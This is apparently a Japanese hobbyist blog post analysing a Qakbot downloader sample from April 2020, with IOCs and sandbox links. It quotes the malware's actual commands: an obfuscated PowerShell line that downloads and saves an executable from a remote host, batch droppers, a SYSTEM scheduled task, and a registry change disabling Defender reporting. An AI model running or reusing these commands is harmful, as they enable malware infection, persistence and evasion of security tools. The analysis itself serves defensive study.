【お友達の特徴】Qakbot-2020/4/10

本記事の説明

お友達の特徴をメモするシリーズです。(第2弾があるかは不明)

Qakbotとは

AKA: Qbot

Banking Trojanに分類されているっぽいけど本当かな?

日本ではあんまり見ないイメージがあるなぁ。

今回は4/10に観測されたお友達

downloaderの特徴

野生のURLは以下です。他にもいっぱいあったぽい。wordpressが改ざんされて使われたのかな?

メールにLinkが添付されていたと思われるが、根拠無し!w

hxxps[:]//leadservice.org/wp-content/themes/calliope/previous/3572136.zip
hxxps[:]//wordpress.njc-web.info/wp-content/themes/calliope/previous/6236162/6236162.zip
hxxps[:]//shivogue.com/wp-content/themes/calliope/previous/831305.zip

zipの中にmaldocがあるタイプ

特徴は

2つのbatのドロップと削除

C:\Users\Public\tmp.bat → cmd /c mkdir ""C:\Users\Public\tmpdir""
C:\Users\Public\tmpdir\tmps1.bat → C:\Windows\SysWOW64\cmd.exe  /C choice /C Y /N /D Y /T 45 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt

で、powershellで本体のダウンロード

cmd /C powershell -Command ''(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2dyZWVubWFnaWNiZC5jb20vd3AtY29udGVudC90aGVtZXMvY2FsbGlvcGUvcHJldmlvdXMvNDQ0NDQ0LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt 

お友達本体のダウンロード先は以下

hxxp[:]//greenmagicbd.com/wp-content/themes/calliope/previous/444444.png

Qakbotの特徴

特徴的なので、Sandboxの振る舞いで判別できそう。

3820E9ACB7231202833BF6876D21ED76
20A3BD948B9203FBD68945DB0C6495613B795A39
075A151169A78F24876112924367FC96F013F7BB95EA6A3AE09D48CC797F35E1

振る舞い

検体のコピー

C:\Users\user\AppData\Roaming\Microsoft\Eeyuq\xnzoowi.exe

file1.exeの中身をcalcに変更!?

'C:\Windows\System32\cmd.exe'  /c ping.exe -n 6 127.0.0.1 &  type 'C:\Windows\System32\calc.exe' > 'C:\Users\user\Desktop\file1.exe'

タスクスケジューラーを利用

“C:\Users\user\Desktop\file1.exe /I erxfgza” を実行するってこと

calcに入れ替わってるけど。汗

'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn erxfgza /tr '\'C:\Users\user\Desktop\file1.exe\' /I erxfgza' /SC ONCE /Z /ST 02:09 /ET 02:21

Defenderの設定変更

C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet' /f /t REG_DWORD /v 'SpyNetReporting' /d '0'

explorer.exeにinjection

通信

3389やないか!

POST /t3 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 67.209.195.198:3389
Content-Length: 81
Cache-Control: no-cache

mixumnuygdyk=L/oWTY+epN3HjCq7fBV4rcS0d2RdWMmgOI/IMBm2WSAiGknJieu92aP0UMT0zxE4eg==

おまけ

やっぱりcalcに変わっている。

IOC

  • 67.209.195.198
  • leadservice.org
  • wordpress.njc-web.info
  • shivogue.com
  • greenmagicbd.com
  • 89F354DDCEB07CAAEF045767B0595F78
  • 82245E956360F83354D8420334794D4A3655DB9F
  • 9CF0DE0D633E45D6AFA8B64D4AA6F2DE90249FA123C15FEB56E1D7715008312E
  • 3820E9ACB7231202833BF6876D21ED76
  • 20A3BD948B9203FBD68945DB0C6495613B795A39
  • 075A151169A78F24876112924367FC96F013F7BB95EA6A3AE09D48CC797F35E1

外部情報

https://www.joesandbox.com/analysis/340503

https://app.any.run/tasks/307ce5e8-f644-4caf-95f0-7f9901dbcf86/